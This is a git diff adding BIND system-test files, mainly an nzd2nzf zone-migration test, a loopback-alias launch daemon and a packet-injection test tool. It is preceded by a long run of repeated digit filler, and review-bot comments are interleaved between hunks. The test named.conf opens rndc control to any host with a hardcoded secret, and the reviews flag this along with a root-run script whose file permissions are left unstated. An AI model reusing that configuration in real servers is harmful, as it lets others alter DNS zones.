1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 
1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 
1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 
1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 
1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 
1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 
1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 
1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 
1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 
1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 
1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 1234567890 +send diff --git a/bin/tests/system/nzd2nzf/clean.sh b/bin/tests/system/nzd2nzf/clean.sh new file mode 100644 index 0000000..153cca1 --- /dev/null +++ b/bin/tests/system/nzd2nzf/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.conf +rm -f */named.run +rm -f */named.memstats +rm -f dig.out.* +rm -f rndc.out* +rm -f ns*/*.nzf +rm -f ns*/*.nzd ns*/*.nzd-lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/nzd2nzf/ns1/added.db b/bin/tests/system/nzd2nzf/ns1/added.db new file mode 100644 index 0000000..286e717 --- /dev/null +++ b/bin/tests/system/nzd2nzf/ns1/added.db 
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+;$ORIGIN added.example.
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ MX 10 mail
+
+a A 10.0.0.1
+mail A 10.0.0.2
diff --git a/bin/tests/system/nzd2nzf/ns1/named.conf.in b/bin/tests/system/nzd2nzf/ns1/named.conf.in
new file mode 100644
index 0000000..d8fc51f
--- /dev/null
+++ b/bin/tests/system/nzd2nzf/ns1/named.conf.in
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ allow-query { any; };
+ recursion no;
+ allow-new-zones yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
diff --git a/bin/tests/system/nzd2nzf/prereq.sh b/bin/tests/system/nzd2nzf/prereq.sh
new file mode 100644
index 0000000..5498945
--- /dev/null
+++ b/bin/tests/system/nzd2nzf/prereq.sh
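Review bot: The `controls` block at the end of nzd2nzf/ns1/named.conf.in accepts rndc connections from `any` host and authenticates them with the fixed secret `1234abcd8765`, and nothing in the file says that this is a test-only configuration. With `allow-new-zones yes;` in `options`, whoever can reach the control port with that key can add zones, so the setup is only safe while 10.53.0.1 remains a loopback alias (the `org.isc.bind.system` script later in this commit creates it with `ifconfig lo0 … alias`). I would add a comment above `key rndc_key`, for example `/* Test-only key and open control ACL: 10.53.0.1 must be a loopback alias; do not copy into a deployed named.conf. */`. The same pattern appears in padding/ns1/named.conf.in and padding/ns2/named.conf.in.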
@@ -0,0 +1,20 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if ! $FEATURETEST --with-lmdb; then
+ echo_i "This test requires LMDB support (--with-lmdb)"
+ exit 255
+fi
+
+exit 0
diff --git a/bin/tests/system/nzd2nzf/setup.sh b/bin/tests/system/nzd2nzf/setup.sh
new file mode 100644
index 0000000..e46affa
--- /dev/null
+++ b/bin/tests/system/nzd2nzf/setup.sh
@@ -0,0 +1,17 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
diff --git a/bin/tests/system/nzd2nzf/tests.sh b/bin/tests/system/nzd2nzf/tests.sh
new file mode 100644
index 0000000..9f86d4a
--- /dev/null
+++ b/bin/tests/system/nzd2nzf/tests.sh
@@ -0,0 +1,80 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "querying for non-existing zone data ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 a.added.example a > dig.out.ns1.$n || ret=1 +grep 'status: REFUSED' dig.out.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "adding a new zone into default NZD using rndc addzone ($n)" +$RNDCCMD 10.53.0.1 addzone "added.example { type master; file \"added.db\"; };" 2>&1 | sed 's/^/I:ns1 /' | cat_i +sleep 2 + +n=`expr $n + 1` +echo_i "querying for existing zone data ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 a.added.example a > dig.out.ns1.$n || ret=1 +grep 'status: NOERROR' dig.out.ns1.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "stopping ns1" +stop_server ns1 + +n=`expr $n + 1` +echo_i "dumping _default.nzd to _default.nzf ($n)" +$NZD2NZF ns1/_default.nzd > ns1/_default.nzf || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that _default.nzf contains the expected content ($n)" +grep 'zone "added.example" { type master; file "added.db"; };' ns1/_default.nzf > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting _default.nzd database" +rm -f ns1/_default.nzd + +echo_i "starting ns1 which should 
migrate the .nzf to .nzd" +start_server --noclean --restart --port ${PORT} ns1 + +n=`expr $n + 1` +echo_i "querying for zone data from migrated zone config ($n)" +# retry loop in case the server restart above causes transient failures +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $DIG $DIGOPTS @10.53.0.1 a.added.example a > dig.out.ns1.$n || ret=1 + grep 'status: NOERROR' dig.out.ns1.$n > /dev/null || ret=1 + [ "$ret" -eq 0 ] && break + sleep 1 +done +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +exit $status diff --git a/bin/tests/system/org.isc.bind.system b/bin/tests/system/org.isc.bind.system new file mode 100644 index 0000000..276437a --- /dev/null +++ b/bin/tests/system/org.isc.bind.system @@ -0,0 +1,27 @@ +#!/bin/sh +# +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +ifup() { + /sbin/ifconfig lo0 10.53.$1.$3 alias + /sbin/ifconfig lo0 inet6 fd92:7065:b8e:${2}ff::${3} alias +} + +for ns in 1 2 3 4 5 6 7 8 9 10 +do + ifup 0 ff $ns +done +for ns in 1 2 +do + ifup 1 99 $ns + ifup 2 00 $ns +done diff --git a/bin/tests/system/org.isc.bind.system.plist b/bin/tests/system/org.isc.bind.system.plist new file mode 100644 index 0000000..18d3c5d --- /dev/null +++ b/bin/tests/system/org.isc.bind.system.plist 
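Review bot: In nzd2nzf/tests.sh the "dumping _default.nzd to _default.nzf" and "checking that _default.nzf contains the expected content" steps test `$ret` without first resetting it, so a failure in the earlier "querying for existing zone data" step is added to `status` again and both later steps print "failed" even when they pass. Each of those two steps should start with `ret=0`, as the query steps do. The `rndc addzone` step pipes its output through `sed` and `cat_i`, so the exit status of rndc is discarded and a rejected addzone only shows up indirectly in the following query after the fixed `sleep 2`. The `n=`expr $n + 1`` after the retry loop also bumps the counter a second time for the same test.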
@@ -0,0 +1,17 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
+ "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+ <key>Label</key>
+ <string>org.isc.bind.system</string>
+ <key>ProgramArguments</key>
+ <array>
+ <string>/bin/bash</string>
+ <string>/Library/LaunchDaemons/org.isc.bind.system</string>
+ </array>
+ <key>RunAtLoad</key>
+ <true/>
+</dict>
+</plist>
+
diff --git a/bin/tests/system/packet.pl b/bin/tests/system/packet.pl
new file mode 100644
index 0000000..900a0c0
--- /dev/null
+++ b/bin/tests/system/packet.pl
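Review bot: The plist runs `/bin/bash /Library/LaunchDaemons/org.isc.bind.system` at load and sets no `UserName` key, so the script presumably runs as root, yet nothing here records the ownership and mode the installed script needs. If that copy is writable by a non-root account, editing it is enough to get commands run as root at the next load. I would add a comment under `<plist version="1.0">`, for example `<!-- Runs as root at load: install the script owned by root and not group- or world-writable. -->`, and repeat the requirement wherever the install steps are documented. The script's `ifconfig` calls also ignore failures, so a missing alias only shows up later as test errors.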
@@ -0,0 +1,164 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# This is a tool for sending an arbitrary packet via UDP or TCP to an +# arbitrary address and port. The packet is specified in a file or on +# the standard input, in the form of a series of bytes in hexadecimal. +# Whitespace is ignored, as is anything following a '#' symbol. +# +# For example, the following input would generate normal query for +# isc.org/NS/IN": +# +# # QID: +# 0c d8 +# # header: +# 01 00 00 01 00 00 00 00 00 00 +# # qname isc.org: +# 03 69 73 63 03 6f 72 67 00 +# # qtype NS: +# 00 02 +# # qclass IN: +# 00 01 +# +# Note that we do not wait for a response for the server. This is simply +# a way of injecting arbitrary packets to test server resposnes. +# +# Usage: packet.pl [-a <address>] [-d] [-p <port>] [-t (udp|tcp)] [-r <repeats>] [filename] +# +# Options: +# -a <address>: specify address (XXX: no IPv6 support yet) +# -p <port>: specify port +# -t <protocol>: specify UDP or TCP +# -r <num>: send packet <num> times +# -d: dump response packets +# +# If not specified, address defaults to 127.0.0.1, port to 53, protocol +# to udp, and file to stdin. 
